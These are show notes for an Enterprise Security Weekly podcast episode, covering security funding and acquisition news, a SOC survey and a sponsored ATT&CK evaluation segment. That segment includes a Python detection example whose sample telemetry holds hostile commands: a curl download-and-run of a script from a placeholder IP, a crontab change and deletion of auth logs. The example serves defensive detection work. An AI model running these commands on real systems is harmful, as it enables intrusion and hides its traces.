esw217

Enterprise Security Weekly Episode #217 – February 24, 2021

Subscribe to all of our shows and mailing list by visiting: https://securityweekly.com/subscribe

1. Red Canary, Imperva Sonar, Data Breaches & Share Prices, & TrendMicro XDR – 12:30 PM-01:00 PM

Announcements

  • Do you want to stay in the loop on all things Security Weekly? Visit https://securityweekly.com/subscribe to subscribe on your favorite podcast catcher or our YouTube channel, sign up for our mailing list, join our Discord Server, and follow us on our newest live-streaming platform, Twitch!

  • Our next live webcast will be on April 29th at 11am ET where you will learn how to prepare for modern ransomware attacks! Visit https://securityweekly.com/webcasts to register now! If you missed any of our previously recorded webcasts or technical trainings, they are available for your viewing pleasure at https://securityweekly.com/ondemand

Description

This week in the Enterprise News: LastPass is no longer free, Tenable helps with dynamic assets, SecurityScorecard and the Score Planner, Trend Micro XDR, & Imperva launches Sonar! Funding announcements from: PerimeterX, SPHERE, Red Canary, 1Kosmos, & Strata Identity! In the Acquisition news: SailPoint to acquire Intello, CrowdStrike to acquire Humio, Palo Alto to acquire Bridgecrew, Kaseya to acquire RocketCyber, & more!

Hosts


Adrian Sanabria

@sawaba

Senior Research Engineer at CyberRisk Alliance

  1. PerimeterX Raises $57M in Growth Capital Funding to Fuel Expansion Into New Geographies and Verticals – This is a series D for PerimeterX and brings total funding to nearly $150m. Like most late-stage funding, this round is all about growing into new markets and onto new continents.
  2. SailPoint Announces Intent to Acquire Intello to Identify, Secure, and Govern Access to SaaS Applications for Today’s Digital Enterprise – At first glance, this looks like a CASB play, but it looks more focused on monitoring SaaS use than doing any kind of enforcement or the man-in-the-middle JavaScript hacks that CASB tends to be associated with. I guess you’d still categorize it as SaaS, even if it’s entirely API-dependent. The acquisition makes sense for SailPoint, as SaaS management is a nice feature-add on top of SailPoint’s existing SSO/IAM offerings.
  3. SPHERE Secures $10 Million in Series A Funding – A women-founded/owned security startup! We don’t see these nearly often enough. SPHERE appears to be a natural evolution of products like Varonis and Stealthbits. It looks like SPHERE can not only identify privileged access and data governance issues but can enforce policies and take action on infractions. They appear to be particularly focused on cloud-based platforms like Office 365, which is smart – that’s where everyone has moved and… O365 can get really messy!
  4. CrowdStrike to Acquire Humio to Deliver Index-Free XDR – We’ve all heard complaints about Splunk costs and many suspect this $400m deal is about (at least partially) alleviating CrowdStrike customers’ Splunk budget. The acquisition totally makes sense, especially for customers that might only be using Splunk to manage CrowdStrike data. I’d expect that Humio would continue to be able to pull in non-CrowdStrike data, as the promise of correlation will only increase the value of the data overall.
  5. Palo Alto Networks Announces Intent to Acquire Bridgecrew – In show #215, we reported the rumor that this acquisition was going down for a number north of $100m. That reporting appears to be accurate, with the final deal value reported as $156m in cash. It’s an amazing return for a company that had only raised $18.1m to date. The acquisition was announced days before the company’s second anniversary from its founding. Bridgecrew is in the rapidly expanding CSPM (cloud security posture management) space. “Highlight all my cloud config mistakes” is another way of thinking of this space.
  6. Security Operations Firm Red Canary Raises $81M To Grow R&D – This brings Red Canary to a total of $125m in funding and I’m honestly glad to see it. Red Canary is one of the few managed security vendors that I consistently hear positive things about. Managed SOC has exploded in recent years, but in my experience, most MSSPs and MDR firms don’t do a great job with detection (or at least, don’t do any better than companies did before they outsourced the function).
  7. How data breaches affect stock market share prices – Comparitech – Big thanks to Gabe Bassett from the Verizon DBIR team for bringing this one to my attention. We know that companies are rarely destroyed by breaches. The ones that do go out of business following a breach tend to be very small. However, the assumption many have (myself included) that big companies always fully recover from a breach seems to be false. This study shows that, from a stock market perspective, nearly all publicly-traded companies that suffer a public breach do worse in the market when compared to market performance before the breach.
  8. John Scott-Railton on Twitter – This is one of the LastPass hot takes from John Scott-Railton, a senior researcher at Citizen Lab.
  9. Changes to LastPass Free – The LastPass Blog – A lot of folks got ruffled by the recent changes to LastPass’s free tier, which has led to some hot takes on where parent company, LogMeIn, might be headed with its new-ish private equity owners. These owners apparently have a history of backing surveillance tech, which doesn’t sit well with folks trusting LastPass with all their passwords.
  10. 1Kosmos Secures $15 Million in Series A Funding from ForgePoint Capital – Quick note: ForgePoint also contributed to two other funding stories this week: Strata and SPHERE! 1Kosmos appears to be trying to solve the complex, frustrating state of authentication. They have both an enterprise-employee-facing and an enterprise-customer-facing product. Looks like they’re leveraging passive methods (certs, device identity) and smartphone biometrics to enable MFA and passwordless use cases. Looks like an evolution of the ubiquitous Duo push method, but uses biometrics instead of tapping “accept”?

Paul Asadoorian

@securityweekly

Founder at Security Weekly

  1. CircleCI announces privacy enhancements for engineering teams
  2. Nutanix announces additional ransomware protections in its cloud platform
  3. SecurityHQ Response: A mobile app that tracks the status of security incidents at any time
  4. CrowdStrike Delivers Advanced Threat Protection for Cloud and Container Workloads
  5. Kaseya acquires RocketCyber
  6. Tenable Launches Exposure Platform for Risk-Based Vulnerability Management of Dynamic Assets
  7. CrowdStrike Global Threat Report Highlights Key Trends in eCrime and Nation-State Activity
  8. Improve Your SecurityScorecard Security Rating with Score Planner
  9. PerimeterX bags $57M to shield enterprise websites from hackers and bots
  10. Trend Micro launches new XDR Trend Micro Vision One
  11. Imperva launches Sonar for unified enterprise security analytics
  12. Cisco AppDynamics Launches New Research, Revealing Unprecedented Demand for Full-Stack Observability

Tyler Shields

@txs

CMO at JupiterOne

  1. Datadog Signs Definitive Agreement to Acquire Sqreen
  2. The Briefing: Bumble Raises IPO Range, SentinelOne Buys Scalyr, And More

2. 2020 Security Operations Survey – 01:00 PM-01:30 PM

Announcements

  • Do you have a specific guest or topic that you want us to cover on one of the shows? Submit your suggestions for guests by visiting https://securityweekly.com/guests and completing the form! We review suggestions monthly and will reach out to you once reviewed!

Description

The 2020 SOC Survey results are in and the author, Chris Crowley, will discuss the detailed results in the report and how they can help individuals and organizations reduce the drag on our global community due to insecure information systems. Effective security operations rely on monitoring your data and being prepared to defend yourself and your organization. Chris will explain why he believes that the classic SOC will move, over the next few years, to MSSPs and how to be ready when threats are detected.

Download the report: https://soc-survey.com/

Guest(s)

Christopher Crowley

Christopher Crowley – Consultant at Montance LLC

@CCrowMontance

Christopher Crowley has been working in computers since he was fifteen years old. He currently operates a boutique consulting firm focusing on security operations. Montance LLC is a trusted independent information security partner providing cybersecurity assessment and framework development services that enable clients to create a new SOC or improve existing security operations.

Hosts


Adrian Sanabria

@sawaba

Senior Research Engineer at CyberRisk Alliance


Paul Asadoorian

@securityweekly

Founder at Security Weekly


Tyler Shields

@txs

CMO at JupiterOne

3. Evaluating the MITRE ATT&CK Evaluations in their Third Year – 01:30 PM-02:00 PM

Sponsored By

Visit https://securityweekly.com/uptycs for more information!

Announcements

  • If you missed Security Weekly Unlocked, you can now access all of the content on-demand, whether you registered before the live event or not, by visiting https://securityweekly.com/unlocked and clicking either the button to register or the button to login!

Description

The latest MITRE ATT&CK vendor evaluations are due out soon. In advance of the new round, Uptycs’ Ganesh Pai and Amit Malik explore the MITRE ATT&CK framework, its ongoing value for analysts, and future plans to extend ATT&CK to cloud and containers. They’ll also show how organizations are translating endpoint and cloud workload telemetry to most effectively support MITRE ATT&CK detections and investigations in the Uptycs Security Analytics Platform.

This segment is sponsored by Uptycs. Visit https://securityweekly.com/uptycs to learn more about them!
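To make the "telemetry to ATT&CK detections" idea in this segment concrete, here is an added example (written for these notes, not Uptycs code and not anything shown in the segment). It runs a few hypothetical detection rules over constructed, osquery-style process-execution records, tags each hit with a real ATT&CK Enterprise technique ID, groups the hits by process ancestry so four alerts read as one chain, and reports which tactic columns the telemetry actually lit up. The event shape, rule names, hosts, and IP are all assumptions for the example; the technique IDs are genuine ATT&CK identifiers, but the choice of which rule maps to which ID is an editorial one.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not real data): process-execution records in a
# generic osquery-like shape. A single host shows a download -> run -> persist ->
# cover-tracks chain; a second host shows benign noise.
SAMPLE_EVENTS = [
    {"host": "web01", "pid": 4101, "ppid": 1, "path": "/usr/bin/curl",
     "cmdline": "curl -s http://198.51.100.7/drop.sh -o /tmp/.x", "user": "www-data"},
    {"host": "web01", "pid": 4102, "ppid": 4101, "path": "/bin/sh",
     "cmdline": "sh /tmp/.x", "user": "www-data"},
    {"host": "web01", "pid": 4103, "ppid": 4102, "path": "/usr/bin/crontab",
     "cmdline": "crontab -", "user": "www-data"},
    {"host": "web01", "pid": 4104, "ppid": 4102, "path": "/bin/rm",
     "cmdline": "rm -f /tmp/.x /var/log/auth.log", "user": "www-data"},
    {"host": "web02", "pid": 900, "ppid": 1, "path": "/usr/sbin/sshd",
     "cmdline": "sshd: alice [priv]", "user": "root"},
]

# Hypothetical rules: (name, predicate, tactic, ATT&CK technique ID).
# The IDs are real ATT&CK Enterprise identifiers; the rule-to-ID mapping is
# the example author's choice, not any vendor's detection content.
RULES = [
    ("download via curl/wget",
     lambda e: re.search(r"\b(curl|wget)\b.*https?://", e["cmdline"]) is not None,
     "command-and-control", "T1105"),          # Ingress Tool Transfer
    ("shell run from /tmp",
     lambda e: e["path"] in ("/bin/sh", "/bin/bash")
               and re.search(r"\s/tmp/", e["cmdline"]) is not None,
     "execution", "T1059.004"),                # Unix Shell
    ("crontab modification",
     lambda e: e["path"].endswith("/crontab") and "-l" not in e["cmdline"].split(),
     "persistence", "T1053.003"),              # Scheduled Task/Job: Cron
    ("log file deletion",
     lambda e: e["path"].endswith("/rm") and "/var/log/" in e["cmdline"],
     "defense-evasion", "T1070.004"),          # Indicator Removal: File Deletion
]


def tag_events(events, rules=RULES):
    """Run every rule over every event; one detection per (event, rule) hit."""
    hits = []
    for e in events:
        for name, pred, tactic, tid in rules:
            if pred(e):
                hits.append({"host": e["host"], "pid": e["pid"], "rule": name,
                             "tactic": tactic, "technique": tid})
    return hits


def chain_by_ancestry(events, hits):
    """Group hits under the root of their process tree, per host, so an analyst
    sees one chain of techniques instead of four unrelated alerts.
    Returns {(host, root_pid): [technique IDs in event order]}."""
    parent = {(e["host"], e["pid"]): e["ppid"] for e in events}

    def root(host, pid):
        # Walk upward while the parent is itself a recorded process.
        while (host, parent.get((host, pid))) in parent:
            pid = parent[(host, pid)]
        return pid

    chains = defaultdict(list)
    for h in hits:
        chains[(h["host"], root(h["host"], h["pid"]))].append(h["technique"])
    return dict(chains)


def coverage(hits):
    """Tactic -> sorted technique IDs observed: where on the matrix this telemetry lands."""
    cov = defaultdict(set)
    for h in hits:
        cov[h["tactic"]].add(h["technique"])
    return {t: sorted(v) for t, v in cov.items()}


if __name__ == "__main__":
    found = tag_events(SAMPLE_EVENTS)
    for h in found:
        print(f'{h["host"]} pid={h["pid"]} {h["technique"]:<10} {h["tactic"]:<20} {h["rule"]}')
    print("chains:", chain_by_ancestry(SAMPLE_EVENTS, found))
    print("coverage:", coverage(found))
```

The useful part for an evaluation reader is the last two functions: a product that only emits the four per-event alerts leaves the analyst to rebuild the chain by hand, while the ancestry grouping is what turns "four techniques" into "one intrusion on web01 rooted at the curl download". The coverage map is the same view the ATT&CK evaluations ask you to think in: which tactic columns your telemetry can actually populate, rather than how many alerts fired.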

Why ATT&CK represents a good test of detection efficacy for buyers https://d1zq5d3dtjfcoj.cloudfront.net/Using-Results-to-Evaluate-Endpoint-Detection-Products_Booklet.pdf

The upcoming ATT&CK 2020 evaluation for Carbanak and FIN7 https://attackevals.mitre-engenuity.org/carbanak-fin7/

Context-rich detections from Uptycs will keep security analysts sane [Blog Post] https://www.uptycs.com/blog/fast-consolidated-and-context-rich-detections-from-uptycs-will-keep-security-analysts-sane

The new ATT&CK Cloud Matrix https://attack.mitre.org/matrices/enterprise/cloud/

Solution page for Uptycs for EDR [Website] https://www.uptycs.com/solutions/endpoint-detection-and-response

Presenter(s)

Amit Malik

Amit Malik – Principal Researcher at Uptycs

Amit is a Principal Researcher at Uptycs. He specializes in threat detection, threat intelligence, and security architecture. Prior to Uptycs, he worked with leading cybersecurity companies such as McAfee, FireEye, and Netskope. He holds multiple patents in the area of threat detection and analysis. He actively contributes to security communities through blogs, trainings, and tools.

Ganesh Pai

Ganesh Pai – Founder and CEO at Uptycs

Ganesh Pai is Founder & CEO of Uptycs. He is a Boston-based entrepreneur and technologist (formerly Akamai, Verivue, NetDevices) and has been awarded multiple U.S. patents. Ganesh received a BE degree in electronics and communication engineering from Mangalore University and an MS in computer science from Temple University.

Hosts


Adrian Sanabria

@sawaba

Senior Research Engineer at CyberRisk Alliance


Paul Asadoorian

@securityweekly

Founder at Security Weekly


Tyler Shields

@txs

CMO at JupiterOne